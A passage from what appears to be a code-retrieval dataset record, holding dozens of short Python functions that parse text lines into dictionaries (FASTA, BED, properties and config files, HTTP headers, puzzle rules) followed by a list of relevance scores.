column_names[2]: '0',\n }\n #print(measurement_current_line)\n # this determines if a line starts with 'X', splits it at the X =,Y =,Z = indicators\n # to spit out a list containing only the 3 values and then updates the corresponding\n # value in the dictionary\n if line[0] == first_char:\n measurement_current_line = re.split(delimeters, line.strip(' '))\n if len(measurement_current_line) == 4:\n new_measurement_dictionary[column_names[0]] = float(measurement_current_line[1].strip())\n new_measurement_dictionary[column_names[1]] = float(measurement_current_line[2].strip())\n new_measurement_dictionary[column_names[2]] = float(measurement_current_line[3].strip())\n measurements_file_container[key] = new_measurement_dictionary\n # this stops the processing when the end of data key '$$EOE' is reached.\n elif line == '$$EOE':\n break\n\n\n return(measurements_file_container)", "def parse_list_output(output):\n lines = output.splitlines()\n keys = filter(None, lines[1].split('|'))\n keys = [x.lower().strip() for x in keys]\n r = []\n for line in lines[3:-1]:\n if len(line.split()) <= 1:\n continue\n values = filter(None, line.split('|'))\n values = [x.strip() for x in values]\n assert len(keys) == len(values)\n record = dict(zip(keys, values))\n r.append(record)\n return r", "def mkwrddct(inputfile):\n fin = open(inputfile)\n words = dict()\n for line in fin:\n w = line.strip()\n words[w] = w\n return words", "def __line_parse_4(index: int, line: list, dictionary: dict, word_list: list):\n if index + 4 >= len(line):\n return\n word_1 = line[index + 4]\n word_2 = line[index + 3]\n word_3 = line[index + 2]\n word_4 = line[index + 1]\n word_5 = line[index]\n\n if word_1 == \"\" or word_2 == \"\" or word_3 == \"\" or word_4 == \"\" or word_5 == \"\":\n return\n\n if word_1 not in dictionary:\n dictionary[word_1] = {\n str(word_1 + \"_4\"): {\n\n }\n }\n if word_1 not in word_list:\n word_list.append(word_1)\n\n \"\"\"word_5 word_4 word_3 word_2 word_1\"\"\"\n if word_5 not in dictionary[word_1][str(word_1 + \"_4\")]:\n dictionary[word_1][str(word_1 + \"_4\")][word_5] = 1\n else:\n dictionary[word_1][str(word_1 + \"_4\")][word_5] = dictionary[word_1][str(word_1 + \"_4\")][word_5] + 1", "def make_lex_dict(self):\n lex_dict = {}\n for line in self.lexicon_full_filepath.split('\\n'):\n sp = line.strip().split('\\t')\n if(len(sp) > 1):\n (word, measure) = line.strip().split('\\t')[0:2]\n lex_dict[word] = float(measure)\n return lex_dict", "def _parse_line(self):\n # check if line contains a rule or not\n stripped = self._line.strip()\n if not stripped or stripped.startswith(\"#\"):\n return None\n\n # strip out double quotes from values, and simplify equals strings\n simplified = self._line.replace(\"==\", \"=\").replace('\"', '')\n\n # return a dictionary formed from the key=value pairs found in line\n return dict(f.strip().split(\"=\", 1) for f in simplified.split(\",\"))", "def parse_line(line):\n parts = line.strip().split('\\t')\n\n output = {}\n\n if len(parts) != len(COLUMNS):\n raise Exception('Incorrect number of columns in line.', parts, COLUMNS)\n\n for key, value in zip(COLUMNS, parts):\n if key == 'attributes':\n output[key] = parse_attributes(value)\n elif key == 'start' or key == 'stop':\n output[key] = int(value)\n else:\n output[key] = value\n\n return output", "def get_rules(data: List[str]) -> Dict[str, Dict[str, int]]:\n contains_split = re.compile(r\"bags?.?$\")\n bags = {}\n\n for line in data:\n color, contains = line.split(\" bags contain \")\n if not contains == \"no other bags.\":\n contains = [contains_split.sub(\"\", item).strip() for item in contains.split(\",\")]\n sub_bags = dict(reversed(a.split(\" \", 1)) for a in contains)\n else: # If there aren't any bags within the bag\n sub_bags = {}\n bags.update({color: sub_bags})\n\n return bags", "def from_file_to_list(input_file):\n\tfile = open(input_file)\n\n\tdict_values = [\"\" for k in range(8)]\n\n\tfor line in file:\n\t\ts = line.split(\" \")\n\t\ts.pop(0) # first column only indicate line's number\n\t\ts.remove('\\n')\n\t\tfor idx, a in enumerate(s):\n\t\t\tdict_values[idx] += a\n\n\n\tfile.close\n\n\treturn dict_values", "def list2dict(L):\n\n dd = {i: L[i].split('\\t') for i in range(len(L))} # auxiliary dict\n D = {}\n # Construct output dictionary of key-value pairs:\n D[dd[0][0]] = {dd[1][0]: dict(zip(dd[0][1:], dd[1][1:])),\n dd[2][0]: dict(zip(dd[0][1:], dd[2][1:]))}\n return D", "def list_to_word_count_dict(self,l):\n to_return = {}\n for i,word in enumerate(l):\n to_return[(word,i)] = 0\n return to_return", "def build_tree(lines: []) -> {}:\n key_regex = re.compile(r\"(?P<key_val>^.*) bags contain(?P<contents>.*$)\")\n values_regex = re.compile(r\"(?P<count>\\d) (?P<color>.+?(?= bag))\")\n bag_map = {}\n for line in lines:\n match = key_regex.match(line)\n key = match['key_val']\n bag_map[key] = {}\n contents = match['contents']\n content_matches = values_regex.findall(contents)\n for color_match in content_matches:\n bag_map[key][color_match[1]] = int(color_match[0])\n\n return bag_map", "def parse_entry(tr):\n\ttr = tr.replace('\"', '')\n\ttrl = tr.split(\"; \")\n\ttrdict = OrderedDict()\n\n\tfor j in trl:\n\t\tk = j.split(\" \")\n\n\t\tif k[0] in trdict:\n# print \"%s already in dict\" % (k[0])\n\t\t\ttrdict[k[0]].append(k[1])\n\t\telse: \n\t\t\ttrdict[k[0]]=[k[1]]\n\treturn trdict", "def headers_raw_to_dict(headers_raw):\n\n if headers_raw is None:\n return None\n headers = headers_raw.splitlines()\n headers_tuples = [header.split(':', 1) for header in headers]\n\n result_dict = {}\n for header_item in headers_tuples:\n if not len(header_item) == 2:\n continue\n\n item_key = header_item[0].strip()\n item_value = header_item[1].strip()\n result_dict[item_key] = item_value\n\n return result_dict", "def _split_by_keypair(self, osw_dict={}): \n lst = osw_dict\n keypair_dict = []\n for d in lst:\n if d['key'] == 'raw_line':\n keypair_lst = re.split(r',',d['value'])\n \n for k,v in keypair_lst:\n _d = [{'timestamp':d['timestamp'] , \n 'category': d['category'], \n 'sub_category': d['sub_category'], \n 'key': k, \n 'value': v}]\n keypair_dict.extend(_d)\n \n return keypair_dict", "def create_dict(self, data):\n\n for i in range(len(data)):\n for j in range(len(data[i])):\n if i+1 < len(data) and \":\" in data[i][j] and \"}\" not in data[i] and \"{\" not in data[i] and data[i+1][0] == \"{\":\n data[i] = data[i] + [data[i+1][0]]\n data[i+1] = data[i+1][1:]\n\n if \":\" in data[i][j] and data[i][j+1] != \"{\":\n data[i][j+1] += \",\\n\"\n elif data[i][j] == \"}\":\n data[i][j] = \"},\\n\"\n elif data[i][j] == \"{\":\n data[i][j] = \"{\\n\"\n data = \"\".join([\"\".join(i) for i in data])\n data = self.separate(data)\n result = []\n\n for item in data:\n ind = item.index(\":\")\n name = item[1:ind-1] # fetch name of date and remove quotes\n if \"{\" in item:\n con = ast.literal_eval(item[ind+1:])[0]\n else:\n con = item[ind+2:-3]\n result.append([name, con])\n return result", "def syllable_dict():\n counts = dict()\n \n with open('data/Syllable_dictionary.txt') as file:\n for line in file:\n arr = line.split(' ', 1)\n if 'E' in arr[1]:\n cts = arr[1].split(' ', 1)\n counts[arr[0].strip('\\'')] = int(cts[1][0])\n counts[(arr[0].strip('\\'') + \"_\")] = int(cts[0][1])\n else:\n counts[arr[0].strip('\\'')] = int(arr[1][0])\n return counts", "def lint_results_to_dict(lint_output):\n data = [line for line in lint_output.split('\\n') if (\n line and line.strip() and line[:10] != ('*'*10))]\n if not data:\n return {'outcome' : 'success'}\n result = {'outcome' : 'issues', 'count' : len(data), \n 'issues' : [line.split(':') for line in data]}\n return result", "def ingest(in_info):\n if type(in_info) == str:\n with open(in_info) as infile:\n lines = (line.split(None) for line in infile)\n in_dict = {defn[0] : defn[1:] for defn in lines}\n else:\n in_dict = in_info\n return in_dict", "def mapper(list_of_textlines):\n text = [i.lower() for i in list_of_textlines]\n text = [re.subn(\"\\s+|\\n+\", \" \", i)[0] for i in text]\n text = [re.subn(\"[.!@#$%^&*()-_+=,./?\\\"'|\\}{:;]+\", \" \", i)[0] for i in text]\n text = [re.split(\"\\s+\", i) for i in text]\n text = [[i for i in j if i != ''] for j in text]\n text = [i for i in text if len(i) > 0]\n text = [item for sublist in text for item in sublist]\n\n return text", "def MinimalBpseqParser(lines):\n result = {'HEADER':[], 'SEQ_STRUCT':[]}\n \n for line in lines:\n if line.startswith('Filename') or line.startswith('Organism') or\\\n line.startswith('Accession') or line.startswith('Citation') or\\\n \":\" in line:\n result['HEADER'].append(line.strip())\n elif len(line.split()) == 3:\n result['SEQ_STRUCT'].append(line.strip())\n else:\n continue #unknown\n return result", "def file2dict(file, dict, start_id):\n id = start_id\n line_number = 0\n file.seek(0)\n for line in file:\n if line_number == 0:\n n_atoms = int(float(line.strip()))\n if line_number >= 2 and line_number < n_atoms + 2:\n values_list = line.split()\n for i in range(1, 4):\n values_list[i] = float(values_list[i])\n dict[id] = {\n \"coor\": values_list[1:],\n \"element\": values_list[0]\n }\n id += 1\n line_number += 1\n return dict", "def main_dictionary():\n for lyric in lyrics:\n for line in lyric.split(\"\\n\"):\n dictionary(line.split(\" \"))", "def read_line2(path):\n f = open(path, 'r', encoding='utf-8')\n lines = f.readlines()\n data = {}\n for idx, i in enumerate(lines):\n data[idx] = i.strip()\n return data", "def _read_header_line_1(self, lines: list) -> dict:\n fields = (\n \"model_id\",\n \"unit_id\",\n \"software_level\",\n \"message_number\",\n \"message_subclass\",\n )\n if self._is_ct25k():\n indices = [1, 3, 4, 6, 7, 8]\n else:\n indices = [1, 3, 4, 7, 8, 9]\n values = [split_string(line, indices) for line in lines]\n return values_to_dict(fields, values)", "def _parse(self, content):\n os.environ['ASTER_VERSION_DIR'] = self.dirn\n cfg = {}\n self._content = content\n for l in split_endlines(self._content):\n if not re.search('^[ ]*#', l):\n try:\n typ, nam, ver, val = l.split('|')\n #print '========>', typ, '//', nam, '//', ver, '//', val\n typ = re.sub('^[ ]*', '', re.sub('[ ]*$', '', typ)).strip()\n val = re.sub('^[ ]*', '', re.sub('[ ]*$', '', val)).strip()\n if val != '':\n val = osp.expandvars(val)\n if cfg.has_key(typ):\n cfg[typ].append(val)\n else:\n cfg[typ] = [val]\n except ValueError:\n pass\n return cfg", "def test_parse_mapping_file_to_dict(self):\r\n s1 = ['#sample\\ta\\tb', '#comment line to skip',\r\n 'x \\t y \\t z ', ' ', '#more skip', 'i\\tj\\tk']\r\n exp = ([['x', 'y', 'z'], ['i', 'j', 'k']],\r\n ['sample', 'a', 'b'],\r\n ['comment line to skip', 'more skip'])\r\n mapdict, comments = parse_mapping_file_to_dict(s1)\r\n expdict = {'x': {'a': 'y', 'b': 'z'}, 'i': {'a': 'j', 'b': 'k'}}\r\n self.assertEqual(mapdict, expdict)\r\n self.assertEqual(comments, ['comment line to skip', 'more skip'])", "def get_id2exonlen_id2line(lines):\n id2exonlen = dict()\n id2line = dict()\n for line in lines:\n (chrom, chromStart, chromEnd, name, score, strand, thickStart, thickEnd, itemRgb, blockCount, blockSizes, blockStarts) = line.rstrip().split(\"\\t\") \n id2exonlen[name] = sum_comma_sep_str(blockSizes)\n id2line[name] = line\n return(id2exonlen, id2line)", "def parse_pizza_info(l):\n\n pizza_dict = {}\n\n for i, element in enumerate(l):\n if element.strip() == '<span class=\"meal-name\" itemprop=\"name\">':\n\n # Names of pizza\n pizza_name = l[i+1].split('<')[0].strip()\n pizza_dict[pizza_name] = []\n\n elif '<div class=\"meal-description-additional-info\" itemprop=\"description\">' in element:\n\n pizza_dict[pizza_name] = re.split(',|and',re.split('<|>|\\(', element.strip())[2])\n pizza_dict[pizza_name] = [x.strip() for x in pizza_dict[pizza_name]]\n pizza_dict[pizza_name] = [x.strip('-') for x in pizza_dict[pizza_name]]\n\n return pizza_dict", "def lines():\n line_dict = {}\n #\n line_dict['ArI'] = 2**0\n line_dict['HgI'] = 2**1\n line_dict['KrI'] = 2**2\n line_dict['NeI'] = 2**3\n line_dict['XeI'] = 2**4\n line_dict['CdI'] = 2**5\n line_dict['ZnI'] = 2**6\n line_dict['HeI'] = 2**7\n line_dict['OH_R24000'] = 2**8\n line_dict['OH_triplespec'] = 2**9\n line_dict['CuI'] = 2**10\n line_dict['ArII'] = 2**11\n line_dict['OH_XSHOOTER'] = 2**12\n line_dict['OH_GNIRS'] = 2**13\n line_dict['OH_NIRES'] = 2**14\n line_dict['ThAr_XSHOOTER_VIS'] = 2**15\n line_dict['OH_GMOS'] = 2**16\n line_dict['OH_MODS'] = 2**17\n line_dict['ThAr_MagE'] = 2**18 # R=4100\n line_dict['OH_FIRE_Echelle'] = 2**19 # R=6000\n line_dict['Ar_IR_GNIRS'] = 2**20 # R=6000\n line_dict['FeI'] = 2**21\n line_dict['FeII'] = 2**22\n line_dict['UNKNWN'] = 2**23\n line_dict['Ar_IR_MOSFIRE'] = 2 ** 24\n line_dict['Ne_IR_MOSFIRE'] = 2 ** 25\n line_dict['OH_MOSFIRE_Y'] = 2 ** 26\n line_dict['OH_MOSFIRE_J'] = 2 ** 27\n line_dict['OH_MOSFIRE_H'] = 2 ** 28\n line_dict['OH_MOSFIRE_K'] = 2 ** 29\n line_dict['ThAr_XSHOOTER_UVB'] = 2**30\n #\n return line_dict", "def _to_dict(self, data_list):\n data_dict = dict(pair.split('=') for pair in data_list)\n return data_dict", "def handle_data(data):\n items = data.split(',')\n items.sort()\n results = {}\n i = 1\n for item in items:\n it = item.split(' ')\n results[i] = (it[0], it[1], int(it[2]))\n print str(i) + \" \" + it[0]\n i += 1\n return results", "def _parse(self, fp):\n res = dict()\n key = u\"\"\n value = u\"\"\n escaped = False\n have_key = False\n skip_ws = True\n pending_ws = \"\"\n ignore_comment = False\n unicode_digits = 0\n unicode_buffer = \"\"\n encoding = \"iso-8859-1\"\n line_count = 0\n while True:\n line = fp.readline()\n if line == \"\": # EOF\n if key != \"\": # Save pending key/value\n res[key.encode(\"utf-8\")] = value.encode(\"utf-8\")\n break;\n line_count += 1\n line = line.decode(encoding)\n skip_ws = True # Always skip white space at beginning of line\n for c in line: # Now look at the individual characters\n if unicode_digits > 0:\n unicode_buffer += c\n unicode_digits -= 1\n if unicode_digits > 0:\n continue\n c = unichr(int(unicode_buffer, 16))\n unicode_buffer = \"\"\n if c == '\\r': # ignore CRs\n continue\n if c == '\\t' or c == '\\f': # Map to white space\n c = ' '\n if skip_ws:\n if c == ' ':\n continue\n else:\n skip_ws = False # Found first non white space character\n if not ignore_comment: # i.e. is not continuation line\n if c == '#' or c == '!': # Skip comment lines\n if line_count <= 2:\n mo = self._codingRegex.search(line)\n if mo:\n encoding = mo.group(1) \n break\n ignore_comment = False\n if escaped: # i.e., previous char was '\\'\n escaped = False\n if c == '\\n': # Next line is continuation even when ...\n ignore_comment = True # ... looking like a comment\n continue\n if c == 'u':\n unicode_digits = 4\n continue\n else:\n if c == \" \": # whitespace is skipped around keys and values\n pending_ws += \" \"\n continue\n if c == '\\\\':\n escaped = True\n continue\n if (c == ':' or c == \"=\") and not have_key:\n have_key = True\n pending_ws = \"\" # skip white space after key\n skip_ws = True # skip white space before value\n continue\n if c == '\\n': # not escaped, end of key/value pair\n if key != \"\":\n res[key.encode(\"utf-8\")] = value.encode(\"utf-8\")\n key = \"\"\n value = \"\"\n pending_ws = \"\"\n have_key = False\n break # continue with next line\n if not have_key:\n key += (pending_ws + c)\n else:\n value += (pending_ws + c)\n pending_ws = \"\"\n\n return res", "def get_recipes_dict(filename, mode_type, encode):\n with open(filename, mode_type, encoding=encode) as file:\n recipe_dict = dict()\n for line in file:\n dish = line.strip()\n amount = int(file.readline())\n buffer_list = list()\n for item in range(amount):\n ingredient, quantity, measure = file.readline().split('|')\n buffer_list.append(\n {'ingredient_name': ingredient.strip(), 'quantity': int(quantity), 'measure': measure.strip()}\n )\n recipe_dict[dish] = buffer_list\n file.readline()\n return recipe_dict", "def extract_all_albums(lines):\n album_dict = {}\n for index, line in enumerate(lines):\n if line.startswith(\"<a\"):\n line_index = int(index)\n line = line.strip()\n albumid = int((lines[index + 1]).strip())\n album_classed = extract_album(lines, line_index)\n album_dict[albumid] = album_classed #assigns the key(id) to the values\n return album_dict", "def _CleanChunk(self, chunk):\n mystr = '\\n'.join(chunk)\n p2 = re.compile(self.pat+'(.*)}', re.DOTALL)\n q2 = p2.search(mystr)\n code = q2.group(2)\n code = BalanceCurlies(code)\n nl, nr = CountCurlies(code)\n assert nl==nr, \"Number of left and right curly braces not equal:\"+code\n envkey = q2.group(1)\n codelist = code.split('\\n')\n return envkey, codelist", "def separate(self, lines):\n\n seps = []\n curr = \"\"\n left = 0\n right = 0\n\n for line in lines.split(\"\\n\"):\n if not line:\n continue\n l = line.count(\"{\")\n r = line.count(\"}\")\n left += l\n right += r\n curr += line + \"\\n\"\n\n if left == right:\n left = 0\n right = 0\n if curr:\n seps.append(curr)\n curr = \"\"\n return seps", "def builddict(fname,ignorestrings=['#'],dictdelim='='):\n\tf = open(fname, \"r\")\n\tline = f.readline()\n\ti = 0\n\t\n\tparamdict={}\n\twhile line != '':\n\t\ttmp = line.strip()\n\t\tif tmp :\n\t\t\tfor st in ignorestrings:\n\t\t\t\ttmp = tmp.split(st)[0]\n\t\t\t\tif len(tmp) >1:\n\t\t\t\t\ttp = tmp.split(dictdelim)\n\t\t\t\t\tkey = tp[0].strip()\n\t\t\t\t\tval = tp[1].strip()\n\t\t\t\t\tparamdict[str(key)] = str(val) \n\t\tline=f.readline()\n\t\n\tf.close()\n\treturn paramdict", "def read(self):\n dictionary = {}\n with open(self.path) as file:\n key_header = \"\"\n for line in file:\n entry = line.strip().split()\n if len(entry) == 0:\n continue\n if len(entry) == 1:\n key_header = entry[0]+\"_\"\n else:\n key = entry[0].strip()\n value = reduce(lambda x1, y1: x1+\" \" + y1, entry[1:])\n dictionary[key_header+key] = value\n return dictionary", "def file_to_dict(file_handle):\n file_contents = file_handle.readlines()\n LOGGER.debug('file contents \\n%s', file_contents)\n output_records = []\n header = None\n last_record_type = 'S' # start new set\n\n for file_contents_line in file_contents:\n\n record_type = file_contents_line[:1]\n LOGGER.debug('record_type=%s', record_type)\n\n if record_type == '0' and last_record_type in ('S', '7'):\n\n # validate/get the header record fields\n header = re.match(REGEX_DE_HEADER, file_contents_line)\n if not header:\n raise Exception('Invalid record format - de header')\n\n elif record_type in ('1', '2', '3') and last_record_type in ('0', '1', '2', '3'):\n\n # validate/get the detail record fields\n detail = re.match(REGEX_DE_DETAIL, file_contents_line)\n if not detail:\n raise Exception('Invalid record format - de detail')\n\n # build transaction record\n LOGGER.debug(\"Creating OUTPUT DICT Direct entry\\n%s\\n%s\", header.groupdict(), detail.groupdict())\n output_record = {'version': 1}\n output_record.update(header.groupdict())\n output_record.update(detail.groupdict())\n LOGGER.debug(\"%s\", output_record)\n\n # add message to output list\n output_records.append(output_record)\n\n elif record_type == '7' and last_record_type in ('1', '2', '3'):\n pass\n else:\n raise Exception(\n 'Invalid record type - record_type=[{}], last_record_type=[{}]'.format(record_type, last_record_type)\n )\n\n last_record_type = record_type\n\n return output_records", "def build_basenames():\r\n dict = {}\r\n with open(STREETS_FILE) as file:\r\n for line in file:\r\n dict[line.strip()] = True\r\n return dict", "def gather_counts(directory):\n counts_un = defaultdict(int)\n counts_bi = defaultdict(int)\n counts_tri = defaultdict(int)\n prev_prev = \"<s>\"\n prev = \"<s>\"\n for filename in os.listdir(f\"./{directory}\"):\n if \".DS_Store\" in filename:\n continue\n with open(f\"./{directory}/{filename}\", \"r\") as f:\n for line in f:\n line = line.strip()\n if len(line) == 0:\n continue\n counts_un[line+\"\\n\"] += 1\n counts_bi[prev+\"\\n\"+line+\"\\n\"] += 1\n counts_tri[prev_prev+\"\\n\"+prev+\"\\n\"+line+\"\\n\"] += 1\n prev_prev = prev\n prev = line\n counts_un[\"</s>\\n\"] += 2\n counts_bi[\"</s>\\n</s>\\n\"] += 1\n counts_bi[prev+\"\\n\"+\"</s>\\n\"] += 1\n counts_tri[prev_prev+\"\\n\"+prev+\"\\n\" + \"</s>\\n\"] += 1\n counts_tri[prev+\"\\n</s>\\n</s>\\n\"] += 1\n return counts_un, counts_bi, counts_tri", "def file_read(filename):\n fin=open(filename)\n count=0\n d=dict()\n for line in fin:\n line=line.replace(\"-\",\" \")\n word=line.split()\n for item in word:\n item=item.strip(string.punctuation + string.whitespace)\n item=item.lower()\n d[item]=d.get(item,0)+1\n count=count+1\n return count,d", "def generate_bed_dict(line, bed_header):\n out_dict = dict((key, value) for key, value in izip(bed_header, line))\n return(out_dict)", "def env_lines_to_dict(self, env_lines):\n env_dict = {}\n for env_line in env_lines:\n split_env_line = shlex.split(env_line)\n if split_env_line[0] == \"export\":\n split_env_line = split_env_line[1:]\n for item in split_env_line:\n if \"=\" in item:\n k, v = item.split(\"=\", 1)\n env_dict[k] = v\n return env_dict", "def format_lines(unprocessed_text: str) -> List[List[str]]:\n stored_lines: List[List[str]] = []\n new_line: List = []\n new_word: str = \"\"\n for char in unprocessed_text:\n if char != \"\\n\":\n if char != \" \" and char.isalpha():\n new_word += char\n else:\n new_line.append(new_word)\n new_word = \"\"\n else:\n stored_lines.append(new_line)\n new_line = []\n return stored_lines", "def collect_response(response_lines):\n response_dict = {}\n for entry in filter(None, response_lines):\n prefix = entry[0]\n if prefix in response_dict:\n response_dict[prefix] += [entry]\n else:\n response_dict[prefix] = [entry]\n return response_dict", "def parse_fasta(dataset):\n\n records = {}\n record_id = None\n\n for line in [lines.strip() for lines in dataset.splitlines()]:\n \n if line.startswith('>'):\n records_id = line[1:]\n records[records_id] = \"\"\n else:\n records[records_id] += line\n #print records\n \n return records" ]
[ "0.6359959", "0.6270492", "0.6224244", "0.6006112", "0.599421", "0.5908032", "0.5810006", "0.579494", "0.57904506", "0.57837945", "0.5747093", "0.57200885", "0.56876975", "0.56852555", "0.5679893", "0.56574166", "0.56393373", "0.5639167", "0.55973274", "0.55856735", "0.5568694", "0.5562582", "0.55551136", "0.5553522", "0.5536525", "0.5527266", "0.552586", "0.5481176", "0.54792583", "0.54542804", "0.5443447", "0.5429592", "0.54041016", "0.53951585", "0.53911376", "0.53753453", "0.53648424", "0.5360278", "0.53548634", "0.5348094", "0.53365827", "0.53323865", "0.5331229", "0.53225505", "0.53222024", "0.53206074", "0.53154266", "0.53150535", "0.5307249", "0.5278402", "0.5277631", "0.52621776", "0.526055", "0.5236088", "0.5227831", "0.52227247", "0.5215159", "0.52050596", "0.5204071", "0.52030087", "0.5201938", "0.5185602", "0.51828986", "0.5179346", "0.51749986", "0.51736045", "0.516977", "0.5168777", "0.5168265", "0.51681423", "0.5158197", "0.51574695", "0.5154557", "0.51516366", "0.5141003", "0.5136903", "0.51349777", "0.5129529", "0.5126662", "0.51247716", "0.51165426", "0.5113415", "0.5109879", "0.5101959", "0.51017284", "0.5100287", "0.50869447", "0.5080343", "0.5076973", "0.5068243", "0.50597936", "0.5058097", "0.5055428", "0.50545704", "0.50543797", "0.50531805", "0.5051531", "0.50491136", "0.5045974", "0.5044756", "0.50429034" ]
0.0
-1
Entry point for the interpreter process.
def interpret(data: list) -> dict: return Interpreter.structure(data)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def run():\n main()", "def main():\n run_program()", "def main():\n pass", "def main():\n return", "def main() -> None:\n return", "def main() -> None:", "def main() -> None:", "def main() -> None:", "def main() -> None:", "def main():\n args = parse_args()\n process_args(args)", "def main(self) -> None:\n pass", "def main():\n\tpass", "def main():\n print(\"is Running!\")", "def console_entry():\n #main()", "def run():\n main(sys.argv[1:])", "def run():\n main(sys.argv[1:])", "def run():\n main(sys.argv[1:])", "def run():\n main(sys.argv[1:])", "def run():\n main(sys.argv[1:])", "def run():\n main(sys.argv[1:])", "def run():\n main(sys.argv[1:])", "def run():\n main(sys.argv[1:])", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def main():", "def run_main():\n main(sys.argv)", "def main():\n\n BASIC.run(PROGRAM)", "def main(self):\r\n pass", "def main():\n Main()", "def main():\n ...", "def main():\n\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n pass", "def main():\n CLI_APP.run()", "def main():\n sys.exit(RBExt().run(sys.argv[1:]))", "def entrypoint(cls):\n try:\n cls().run(sys.argv[1:])\n except KeyboardInterrupt:\n pass", "def main():\n print(\"Call your main application code here\")", "def main():\n print(\"Call your main application code here\")", "def main():\n print(\"Call your main application code here\")", "def run():\n\n call_args = sys.argv[1:]\n main(call_args)", "def main():\n\n try:\n args.handler()\n except pymoira.BaseError as err:\n error( err )", "def main():\n pass", "def main():\n print(\"def main\")\n return APP.run()", "def main():\n greetings()\n run_jarvis()", "def main(args=None):\n app()\n return 0", "def main(args):", "def main(args):", "def main(args=None):", "def main(args=None):", "def main():\n print_title()\n run_terminal()", "def run():\n # main(sys.argv[1:])\n main()", "def main():\n\tcli = Cli()\n\tcli.run()", "def _main():\n try:\n parser, options, arguments = _parse_options()\n env.update(vars(options))\n\n arguments = parser.largs\n\n if not (arguments):\n parser.print_help()\n sys.exit(0)\n\n commands_to_run = _parse_arguments(arguments)\n\n for name, args, kwargs in commands_to_run:\n try:\n func = globals()[name]\n except KeyError:\n sys.stderr.write('Command %s does not exist' % name)\n sys.exit(1)\n\n func(*args, **kwargs)\n except SystemExit:\n raise\n except KeyboardInterrupt:\n sys.stdout.write('\\nQuit\\n')\n\n sys.exit(0)", "def main():\n\n pass\n\n return None", "def main():\n\n pass\n\n return None", "def main():\n get_engine(onnx_file_path, engine_file_path)", "def main(self):\n cmd = \"self.%s(sys.stdin)\" % sys.argv[1]\n exec(cmd)", "def entry_point():", "def entry_point():", "def entry_point():" ]
[ "0.7234675", "0.7215261", "0.7081077", "0.7078648", "0.7007489", "0.6970343", "0.6970343", "0.6970343", "0.6970343", "0.6953635", "0.69507045", "0.6907722", "0.683263", "0.6791568", "0.67693144", "0.67693144", "0.67693144", "0.67693144", "0.67693144", "0.67693144", "0.67693144", "0.67693144", "0.676319", "0.676319", "0.676319", "0.676319", "0.676319", "0.676319", "0.676319", "0.676319", "0.676319", "0.676319", "0.676319", "0.676319", "0.676319", "0.676319", "0.676319", "0.676319", "0.676319", "0.676319", "0.676319", "0.676319", "0.676319", "0.676319", "0.676187", "0.67504084", "0.67454857", "0.673418", "0.67244214", "0.6724404", "0.6711659", "0.6711659", "0.6711659", "0.6711659", "0.6711659", "0.6711659", "0.6711659", "0.6711659", "0.6711659", "0.6711659", "0.6711659", "0.6711659", "0.6711659", "0.6711659", "0.6711659", "0.6711659", "0.6711659", "0.6711659", "0.6711659", "0.6711659", "0.6711659", "0.6711659", "0.6711659", "0.6711659", "0.67053825", "0.66925776", "0.6672022", "0.66596675", "0.66596675", "0.66596675", "0.65951234", "0.6592376", "0.6588621", "0.6567874", "0.65454483", "0.65417564", "0.6540287", "0.6540287", "0.6518041", "0.6518041", "0.6515949", "0.6499827", "0.6491814", "0.6484809", "0.64633155", "0.64633155", "0.6447633", "0.6433612", "0.64245886", "0.64245886", "0.64245886" ]
0.0
-1
Checks a files permissions against a permission requirement
def _does_perms_meet_req(stats, disallowed_perms): # There's undoubtedly some simple clever binary algebra way to do this vals_with = dict() vals_with['r'] = [4, 5, 6, 7] vals_with['w'] = [2, 3, 6, 7] vals_with['x'] = [1, 3, 5, 7] # Scopes are User, Group, and World scope = ['U', 'G', 'W'] sections = disallowed_perms.split(',') # Sections are the three sections in the disallowed string we are passed, # which represent user, group, and world. # If we didn't get 3 sections, it's malformed - pass the test with a note if len(sections) is not 3: return_result = TestResult(Result.SKIP, notes="Malformed permission req") else: did_pass = True reason = "" # Get numeric value for file permissions - eg 644 file_perms_num = oct(stats.st_mode & 0o777)[-3:] cur_pos = 0 for section in sections: cur_perm = file_perms_num[cur_pos] # If we're checking for read access and the numeric permission # indicates that read access is granted, it's failed... add why to # the notes if 'r' in section and int(cur_perm) in vals_with['r']: did_pass = False reason += scope[cur_pos] + ':r ' # Same for write access... if 'w' in section and int(cur_perm) in vals_with['w']: did_pass = False reason += scope[cur_pos] + ':w ' # and execute access if 'x' in section and int(cur_perm) in vals_with['x']: did_pass = False reason += scope[cur_pos] + ':x ' # Next time through the loop look at the next section cur_pos += 1 if did_pass: return_result = TestResult(Result.PASS) else: return_result = TestResult(Result.FAIL, notes=reason) return return_result
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_permissions(self):\n self.assertEqual(dir_perm, 0o2750)\n self.assertEqual(file_perm, 0o0440)", "def check_files_permissions(self):\n result = []\n interesting_files = [\n # directories\n '/etc/init.d'\n '/etc/cron.d',\n '/etc/cron.daily',\n '/etc/cron.hourly',\n '/etc/cron.monthly',\n '/etc/cron.weekly',\n\n # files\n '/etc/sudoers',\n '/etc/exports',\n '/etc/at.allow',\n '/etc/at.deny',\n '/etc/crontab',\n '/etc/cron.allow',\n '/etc/cron.deny',\n '/etc/anacrontab',\n '/var/spool/cron/crontabs/root',\n ]\n\n for path in interesting_files:\n if os.path.isdir(path):\n for root, dirs, files in os.walk(path):\n for file in files:\n fullpath = os.path.join(root, file)\n fm = FileManager(fullpath, check_inside=True)\n result.append(fm)\n else:\n fm = FileManager(path, check_inside=True)\n result.append(fm)\n\n return 'files_permissions', result", "def file_perms( fname, permissions, remote=None ):\n if remote == None:\n if perms.i_own( fname ):\n if type(permissions) == type(''):\n perms.apply_chmod( fname, permissions )\n else:\n # assume 'permissions' is a tuple or list\n perms.apply_chmod( fname, *permissions )\n else:\n if remote.x_i_own( fname ):\n if type(permissions) == type(''):\n remote.x_apply_chmod( 